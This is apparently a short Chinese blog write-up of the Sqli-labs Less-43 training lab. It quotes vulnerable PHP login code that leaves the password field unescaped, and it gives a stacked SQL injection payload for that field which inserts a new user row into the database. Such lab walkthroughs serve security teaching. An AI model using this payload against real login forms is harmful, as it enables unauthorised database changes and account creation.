本关与42关的原理基本一致,我们还是定位在login.php中的password。关键代码:

$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";

登录:username:admin

Password:c');insert into users(id,username,password) values('43','less43','hello')#

Sqli-labs Less-43 堆叠注入

可以看到成功创建了一个新用户。

其他的操作这里就不进行演示了。 

相关文章:

  • 2021-12-06
  • 2021-11-13
  • 2021-10-11
  • 2021-05-22
  • 2021-09-25
  • 2021-08-07
  • 2022-12-23
  • 2021-10-19
猜你喜欢
  • 2021-05-20
  • 2021-07-20
  • 2021-05-27
  • 2022-01-18
  • 2021-06-12
  • 2021-11-28
  • 2022-01-10
相关资源
相似解决方案